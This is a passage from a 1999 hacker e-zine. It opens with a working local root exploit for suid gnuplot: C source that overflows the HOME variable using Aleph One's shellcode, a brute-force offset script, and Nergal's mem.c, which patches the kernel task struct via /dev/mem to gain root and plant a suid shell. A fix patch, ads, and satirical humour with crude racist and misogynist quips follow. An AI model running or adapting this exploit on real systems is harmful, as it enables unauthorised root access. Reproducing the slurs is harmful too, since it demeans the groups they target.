gcc -o xnec_plot xnec_plot.c ./xnec_plot <bufsiz> <offset> The buffer we're overflowing is only 80 bytes, so we're going to have to get our settings just so. If you don't feel like typing in command line offsets and bufsizes, make a little shell script: --- #! /bin/bash bufsiz=110 offset=0 while [ $offset -lt 500 ]; do ./xnec_plot $bufsiz $offset offset=`expr $offset + 10` done --- since gnuplot drops root privs after it inits your svga, we can't just exec /bin/sh, we'll need to use the technique of replacing our saved uid in /dev/mem with '0', then execing whatever we please. We do this by compiling Nergal's program, mem.c and putting the output file in /tmp/xp, as in gcc -o /tmp/xp mem.c. Nergal's program will then make /tmp/sh suidroot, so don't forget to cp /bin/sh /tmp/sh. You will also have to change line 32 to the correct address of kstat, which can be obtained by doing strings /proc/ksyms | grep kstat. Since I can see absolutely no reason for gnuplot to be suidroot, the best fix is chmod -s /usr/bin/gnuplot. greets to #sk1llz, xnec on EFnet and DALnet */ #include <stdlib.h> #define DEFAULT_OFFSET 50 #define DEFAULT_BUFSIZ 110 #define NOP 0x90 #define DEFAULT_ADDR 0xbffff81c /* Aleph One's shellcode, modified to run our own program */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/xp"; unsigned long getsp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buf, *ret; long *addrp, addr; int bufsiz, offset; int i; bufsiz=DEFAULT_BUFSIZ; offset=DEFAULT_OFFSET; if (argc = 2) bufsiz = atoi(argv[1]); if (argc = 3) offset = atoi(argv[2]); buf=malloc(bufsiz); addr = getsp() - offset; printf("address: 0x%x\n", addr); printf("bufsize: %d\n", bufsiz); printf("offset : %d\n", offset); ret = buf; addrp = (long *) ret; for (i = 0; i < bufsiz; i+=4) *(addrp++) = addr; memset(buf, NOP, (strlen(shellcode)/2)); ret = buf + ((bufsiz/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ret++) = shellcode[i]; buf[bufsiz - 1] = '\0'; memcpy(buf,"HOME=", 5); setenv("HOME", buf, 1); execvp("/usr/bin/gnuplot", NULL); } ---snip--- mem.c ---snip--- /* by Nergal */ #define SEEK_SET 0 #define __KERNEL__ #include <linux/sched.h> #undef __KERNEL__ #define SIZEOF sizeof(struct task_struct) int mem_fd; int mypid; void testtask (unsigned int mem_offset) { struct task_struct some_task; int uid, pid; lseek (mem_fd, mem_offset, SEEK_SET); read (mem_fd, &some_task, SIZEOF); if (some_task.pid == mypid) /* is it our task_struct ? */ { some_task.euid = 0; some_task.fsuid = 0; /* needed for chown */ lseek (mem_fd, mem_offset, SEEK_SET); write (mem_fd, &some_task, SIZEOF); /* from now on, there is no law beyond do what thou wilt */ chown ("/tmp/sh", 0, 0); chmod ("/tmp/sh", 04755); exit (0); } } #define KSTAT 0x001a8fb8 /* <-- replace this addr with that of your kstat */ main () /* by doing strings /proc/ksyms |grep kstat */ { unsigned int i; struct task_struct *task[NR_TASKS]; unsigned int task_addr = KSTAT - NR_TASKS * 4; mem_fd = 3; /* presumed to be opened /dev/mem */ mypid = getpid (); lseek (mem_fd, task_addr, SEEK_SET); read (mem_fd, task, NR_TASKS * 4); for (i = 0; i < NR_TASKS; i++) if (task[i]) testtask ((unsigned int)(task[i])); } ---snip--- FIX: Since I see absolutely no good reason why gnuplot should be suidroot (who, besides root, is going to run it, anyway?), I would recommend a simple chmod -s /usr/bin/gnuplot. If you absolutely insist on suid, here's the patch: --- plot.c.old Fri Mar 5 03:17:59 1999 +++ plot.c Fri Mar 5 03:29:19 1999 @@ -516,7 +516,7 @@ char c='\0';/* character that should be added, or \0, if none */ if(tmp_home) { - strcpy(home,tmp_home); + strncpy(home,tmp_home,(sizeof(home) - 1)); if( strlen(home) ) p = &home[strlen(home)-1]; else p = home; #if defined(MSDOS) || defined(ATARI) || defined( OS2 ) || defined(_Windows) || defined(DOS386) However, this by no means was a comprehensive security audit of gnuplot, so there may very well be a dozen other problems I've not fixed. -xnec ################################################################## # xnec@inferno.tusculum.edu - xnec on IRC EF and DALnet # ################################################################## @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ It isn't by mere chance that "anal" is part of the word "analyst" - Anonymous (Ex?)Analyst "Its like my yo-yo, what made it special made it dangerous, so I buried it ..." - Kate Bush (Cloudbusting) Seen on Doonesbury (as reported by HNN and Innerpulse.com) script included below for completeness .... <:-p Dad - "I Can't understand how anyone could break into our server we just installed a new firewall!" Girl - "Its easy Pop, anybody can hack these days, even newbies can just pull kiddie scripts <sic> off the web and put an exploit into play within seconds Theres just no degree of difficulty anymore, half my computer class has hacked into the Strategic Air Command." Dad - "They WHAT!" Girl - "To collect old launch codes. Its no big deal." I still don't think Doonesbury is, was or ever will be, funny but to each their own... - Ed More humour from www.innerpulse.com; SNET Consumer Tip Hotline Contributed by siko Tuesday - March 23, 1999. 05:36PM GMT SNET Consumer Tip Hotline helps people with their everyday struggles. Innerpulse President, siko, provides the inf0z for the heads up in the scene. 1-800-999-8477 2351 Portable Computers. 2352 Avoiding Viruses. 2354 It's Broken! Innerpulse recommends 2352, Avoiding Viruses. It gives keen insight into the dark world of computer viruses created by shady criminals on the fringe of the web. AntiOnline Saga Continues Contributed by siko Tuesday - March 23, 1999. 04:33AM GMT Late last night, an expert panel of Innerpulse analysts reading through the new AntiOnline mail bag were able to make several key insights as to the organization and operation of AntiOnline. Dan Martin, who was obviously leaked some inside information from someone high up in the AntiOnline heirarchy, let the world know about the disasters over at AntiOnline. Not only is the lobby messy, but AntiOnline gets their news from what market experts are calling.. Innerpulse.com. "I used the investment money to support my cocaine habit", boasted JP just before he blasted Mexicans for being what he thinks as inferior to himself. Other sections of the Mail Bag included racist remarks aimed at Brazilians, Chinese, and Arabs (we can only assume he was knocking Arabs with the bombing cracks). "This is an outrage. How could he tear up so many different different people. And worst of all he forgot to tear up the Japanese.", said a respected member of the Internet community. Also, Innerpulse CEO, Marvin Speling, has decided to contact the resident Innerpulse Legal staff since it seems AntiOnline is what is legally termed as "Crampin my style". Innerpulse likes people of all race, creed, color, sex, age, and origin. Undernet patrons excluded. New Study Results: Only Idle on IRC Contributed by siko Sunday - March 21, 1999. 09:12PM GMT Innerpulse.com spent time on Efnet and Undernet and picked up a thing or two. Innerpulse has now learned that just because someone is idle for a week on IRC doesn't mean your news page should idle for a week, as Innerpulse Media Ltd. has concluded in a comprehensive study early this morning. "Sometimes I idle on IRC for 2, 3 days at a time. The idea of idling elsewhere on the Internet is new... ", commented an unknown Undernet IRC patron. "But I guess it could be kind of elite..". Among other areas explored by the small panel of hackers who tested internet waters for over a week as a supplement to Gateway's study included IRC relationships and an inside look at why hackers hack. Innerpulse head janitor, Bobo Jensen, commented on his IRC relationship and how it all fit in with his wildly successful life. Innerpulse Analyst, Mark Winters, speculated on the future of online relationships: "We all know bitches aint shit. What do you want me to say?" AOL's security compromised Contributed by blanco Sunday - March 21, 1999. 08:01PM UTC An 18-year-old high school dropout has been charged with computer tampering after hacking into the internal computers of America Online and altering some programs. The super k-rad hacker apparently exploited AOL's main server by "Punting" it, which apparently it's servers cannot handle. This AOL hacker did not return phone calls when Innerpulse contacted him for further information. AOL security expert Mark Winters made these comments, " It appears after we upgraded all of our servers to Windows98 last week that we didn't patch it to AOL standard. Fixing a punt attack like this one will cost us about $50,000. In reality that isn't too much, since we charge our customers $20.00 per m onth when they can barely use our service due to busy signals." USA today Flood Net has Local IRC'er's 'Shitting Bricks' Contributed by siko Tuesday - March 09, 1999. 09:17PM GMT It was a calm, placid seeming Tuesday afternoon on the Internet. Thats when what one channel member is calling 'an outbreak from hell' occured. "I looked away to see what was on TV, and next thing I know, they were filling our channel up. There were at least 20 of them", said one channel member. The hacker and his channel wish to remain nameless. "Next thing I know they were sending a msg to the channel saying 'owned!!!!!@@#